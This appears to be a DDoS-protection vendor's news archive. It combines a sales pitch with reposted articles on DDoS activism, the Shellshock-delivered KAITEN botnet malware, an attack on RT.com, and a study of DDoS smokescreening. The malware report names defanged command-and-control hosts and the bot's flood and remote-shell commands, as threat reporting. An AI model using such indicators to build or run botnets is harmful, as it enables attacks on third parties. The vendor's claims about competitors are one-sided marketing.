DDoS Protection Specialist Archive

As the Director of Sales for DOSarrest Internet Security I have the opportunity to speak with many prospects looking for DDoS protection service for their corporate website.

What I have learned is that there are many competitors offering what I would call a “bare bones vanilla offering”.

Some offer free service to service ranging in price from $200 – $300/month. These plans offer a very basic protection. They also advertise an Enterprise offering that has an expense starting point can really turn into being quite costly depending on your circumstances.

The Enterprise service is the offering that any company that is serious about protecting their website should consider. There are a few issues with each of these offerings that I’d like to point out.

These competitors claim they have a very large number of clients utilizing their services but fail to mention that 80-85% of them are using their free service. Roughly 10 -15% of their customers are using their $200-$300/month service which again is really just a basic protection with limited protection capabilities.

When a company witnesses a large attack, which is completely out of their control, they are told they should upgrade to their enterprise offering. I hear from prospects quite often that this $200 – $300/month service does not offer adequate protection nor customer support.

In most cases there is no phone support included at all! Also they will charge the client based on the size of the attack? How can a client control the size of an attack they are experiencing! This uncertainty makes it virtually impossible for a company to budget costs. Let’s not be mistaken, their goal is to get you onto their Enterprise offering which will cost you in excess of a thousand dollars per month.

Alternately at DOSarrest Internet Security we offer a single Enterprise level service for all of our clients.

The service includes full telephone and email access to our 24/7 support team with our service. This provides you direct access to system experts. We do not operate a tiered support service given the criticality of the service.

Also we protect our clients from all DDoS attacks regardless of size without the need to pay us additional depending on the size of an attack.

We also include an external monitoring account with our service called DEMS which stands for our DOSarrest External Monitoring Service. This allows our 24/7 support team to monitor your website from 8 sensors in 4 geographical regions.

We proactively inform our clients if we notice any issues with their website. Most of our competitors do not offer this service and if they do it is not included free of charge to their clients.

DOSarrest has been providing DDoS protection services since 2007. Globally we were one of the very first DDoS protection providers and have successfully mitigated thousands of real world attacks. This is a not an “add on product” for us. Our team has the experience and the protection of a client’s website is our #1 priority. Please visit our newly revamped website and take a look at the testimonials page to see what some of our current customers are saying about their experience with us.

Please feel free to reach out to me directly or anyone on our sales team at sales@dosarrest.com for further information on our service.

Brian Mohammed

Director of Sales for DOSarrest Internet Security LTD.

When you start with the premise that capitalism is illegitimate it’s easy to dismiss other people’s property rights.

To some people, a political mission matters more than anything, including your rights. Such people (the Bolsheviks come to mind) have caused a great deal of damage and suffering throughout history, especially in the last 100 years or so. Now they’re taking their mission online. You better not get in their way.

Molly Sauter, a doctoral student at McGill University and a research affiliate at the Berkman Center at Harvard (“exploring cyberspace, sharing its study & pioneering its development”), has a paper calling the use of DDOS (distributed denial of service) attacks a legitimate form of activism and protest. This can’t go unchallenged.

Sauter notes the severe penalties for DDOS attacks under “…Title 18, Section 1030 (a)(5) of the US Code, otherwise known as the CFAA” (Computer Fraud and Abuse Act). This section is short enough that I may as well quote it here verbatim:

(5)(A) [Whoever] knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
(B) intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or
(C) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss.

There are other problems with the CFAA with respect to some legitimate security research and whether it technically falls afoul of the act, but that’s not the issue here.

Sauter goes on in some detail with the penalties under Federal law for violating this act and, no argument here, they are extreme and excessive. You can easily end up with many years in prison. This is, in fact, a problem generally true of Federal law, the number of crimes under which has grown insanely in the last 30 or so years, with the penalties growing proportionately. For an informed and intelligent rant on the problem I recommend Three Felonies a Day by Harvey Silverglate. Back to hacktivist DDOS attacks.

She cites cases of DDOS attacks committed against Koch Industries, Paypal, the Church of Scientology and Lufthansa Airlines, some of these by the hacktivists who call themselves Anonymous. In the US cases of the attacks against Koch, Paypal and the Church, the attackers received prison time and large fines and restitution payments. In the Lufthansa case, in a German court, the attacker was sentenced to pay a fine or serve 90 days in jail; that sentence was overturned on appeal. The court ruled that “…the online demonstration did not constitute a show of force but was intended to influence public opinion.”

This is the sort of progressive opinion, dismissive of property rights, that Sauter regrets is not happening here in the US. She notes, and this makes sense to me, that the draconian penalties in the CFAA induce guilty pleas from defendants, preventing the opportunity for a Lufthansa-like precedent.

This is part and parcel of the same outrageous growth of Federal criminal law I mentioned earlier; you’ll find the same incentive to plead guilty, even if you’re just flat-out innocent, all over the US Code. I would join Sauter in calling for some sanity in the sentencing in the CFAA, but I part ways with her argument that political motives are a mitigating, even excusing factor.

Sauter’s logic rises from a foundation of anti-capitalism:

…it would appear that the online space is being or has already been abdicated to a capitalist-commercial governance structure, which happily merges the interests of corporate capitalism with those of the post-9/11 security state while eliding democratic values of political participation and protest, all in the name of ‘stability.’

Once you determine that capitalism is illegitimate, respect for other people’s property rights is no longer a problem. Fortunately, the law protects people against the likes of Anonymous and other anti-capitalist heroes of the far left.

I would not have known or cared about Sauter’s article had it not been for a favorable link to it by Bruce Schneier. Schneier is a Fellow at the Berkman Center.

Progressives and other leftists who think DDOS, i.e. impeding the business of a person or entity with whom you disagree in order to make a political point, should consider the shoe on the other foot. If I disagree with Schneier’s positions is it cool for me to crash his web site or those of other organizations with which he is affiliated, such as the Berkman Center, the New America Foundation’s Open Technology Institute, the Electronic Frontier Foundation, the Electronic Privacy Information Center and BT (formerly British Telecom)? I could apply the same principle to anti-abortion protesters impeding access to a clinic. I’m disappointed with Schneier for implying with his link that it’s legitimate to engage in DDOS attacks for political purposes.

It’s worth repeating that Sauter has a point about the CFAA, particularly with respect to the sentences. It does need to be reformed — along with a large chunk of other Federal law. The point of these laws is supposed to be to protect people against the offenses of others, not to protect the offender.

Source: http://www.zdnet.com/researcher-makes-the-case-for-ddos-attacks-7000034560/

Attackers have been leveraging Shellshockvulnerabilities to deliver malware since the issue was disclosed in late September, and now researchers with Trend Micro have observed a Bash bug payload – detected as TROJ_BASHKAI.SM – downloading the source code of KAITEN malware.

KAITEN is an older Internet Relay Chat (IRC)-controlled malware that is typically used to carry out distributed denial-of-service (DDoS) attacks, so spreading the infection can help the attackers bring down targeted organizations, according to a Sunday Trend Micro post.

“The purpose is to add compromised systems to botnets,” Christopher Budd, global threat communications manager with Trend Micro, told SCMagazine.com in a Monday email correspondence. “In this case these are botnets primarily focused on launching DDoS attacks.”

Getting KAITEN on the system – Linux/UNIX and Mac OS X systems are at risk, Budd said – is not a direct process.

TROJ_BASHKAI.SM connects to two URLs when executed, according to the post. The first URL downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file detected as ELF_KAITEN.SM.

Compiling ensures proper execution of the malware because, if downloaded directly as an executable, the file runs the risk of having compatibility issues with different Linux OS distributions, the post indicates. Furthermore, the file will evade network security systems that only scan for executables.

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net, joins IRC channel #pwn, and awaits commands, according to the post. Some commands include perform UDP flood, perform SYN flood, download files, send raw IRC command, start remote shell, perform PUCH-ACK flood, and disable, enable, terminate client.

When TROJ_BASHKAI.SM connects to the second URL, KAITEN source code is downloaded and similarly compiled into ELF_KAITEN.A, which is essentially the same as ELF_KAITEN.SM except that it connects to linksys[dot]secureshellz[dot]net[colon]25 and to channel #shellshock, the post indicates.


Source: http://www.scmagazine.com/bash-bug-payload-downloads-kaiten-malware/article/375650/

The editorial Board of the Russia Today TV channel reported the most powerful DDoS attack on their website. This information was published on the website.

“Website RT.com today has been the most powerful DDoS attack for all time of existence of the channel. Power DDoS attack UDP flood on the RT site reached 10 Gbit/s. Thanks to the reliable technical protection of the site, RT.com was unavailable just a few minutes, however, the DDoS attack lasted”, – stated in the message.

Responsibility for hacker attack so far has not been declared.

Website RT.com subjected to DDoS attacks repeatedly. One of the most powerful hacker attacks occurred on February 18, 2013. The work of the RT site in English managed to recover only later, 6 hours after the start of the attack. In August 2012 sites of RT channels in English and Spanish were also under attack. Then the responsibility it has assumed hacker group AntiLeaks, which opposes the project WikiLeaks Julian Assange.

Source: http://newstwenty4seven.com/en/news/russia-today-zajavil-o-moschnejshej-ddos-atake-na-svoj-sajt

New study warns of rising smokescreening practice in cyberattacks

The top takeaway of a new study suggests that more and more frequently, distributed denial of service (DDoS) attacks are being used as a smokescreen, distracting organizations while malware or viruses are injected to steal money, data, or intellectual property.

The white paper, the 2014 Neustar Annual DDoS Attacks and Impact Report: A Neustar High-Tech Brief, reveals insights into this trend based on a survey of 440 North American companies, comparing DDoS findings from 2013 to 2012.

Over the last year, the study found, DDoS attacks evolved in strategy and tactics. More than half of attacked companies also reported theft of funds, data, or intellectual property. These cyber-attacks are intense but quick, more surgical in nature than sustained strikes whose goal is to extend downtime.

This year’s survey also demonstrated that the landscape of DDoS attacks is changing. The number of attacks is up, but attack duration is down, meaning that attacks are becoming more intense and harder to catch. Larger attacks are more common, but most attacks still are less than 1 Gbps. Although companies report a greater financial risk during a DDoS outage, most still rely on traditional defenses like firewall, rather than purpose-built solutions like DDoS mitigation hardware or cloud services.

Among the study’s other findings:

  • Virus and malware insertion during DDoS attacks was common, with 47 percent of companies who experienced a DDoS attack and data breach simultaneously reported the installation of a virus or malware.
  • The industry sees DDoS as a growing threat, with 91 percent of high-tech respondents viewing DDoS as a similar or larger threat than just a year ago.
  • 87 percent of companies attacked were hit multiple times.
  • Nearly twice as many businesses were hit: in 2013, 60 percent of companies were DDoS-attacked, up from 35 percent in 2012.  And these attacks were of shorter duration in 2013.
  • Attacks between 1 and 5 Gbps almost tripled.
  • Customer support is the leading area of impact. For 53 percent of tech companies that suffered an outage, customer service was cited as the area most affected, while 47 percent named brand/customer confidence as the most affected.
  • Collectively, non-IT/security groups see the greatest cost increases in the event of a DDoS attack.
  • High-tech revenue losses are in line with those of other sectors. In 2013, DDoS was just as risky for high-tech as for other verticals, with 47 percent reporting revenue risks of more than $50 K per hour and 31 percent hourly risks of more than $100 K. That means that daily revenue risks are often measured in seven figures.

The conclusion of the report is that there is a trend towards shorter DDoS attacks, but also more attacks from 1 to 5 Gbps — quicker, more concentrated strikes, that suggest a growing presence of a highly damaging tactic called DDoS smokescreening.

Smokescreening distracts IT and security teams with a DDoS attack, allowing criminals to grab and clone private data to siphon off funds, intellectual property, and other information.  In one case, thieves used DDoS to steal bank customers’ credentials and drain $9 million from ATMs in just 48 hours. Such crimes have caused the FDIC to warn about DDoS as a diversionary tactic.

The study urges businesses to watch for the warning signs, including shorter, more intense attacks with no extortion or policy demands.  It also counsels them to follow best practices such as not assigning all resources to DDoS mitigation, but dedicating some staff to monitoring entry systems during attacks, making sure everything is patched with up-to-date security and to establish dedicated DDoS protection.

Rodney Joffe, Neustar senior VP and senior technologist notes, “The stakes are much higher. If you’re a criminal, why mess around with extortion when you can just go ahead and steal — and on a much greater scale?”

Source: http://www.bsminfo.com/doc/smokescreening-is-the-latest-danger-in-ddos-attacks-0001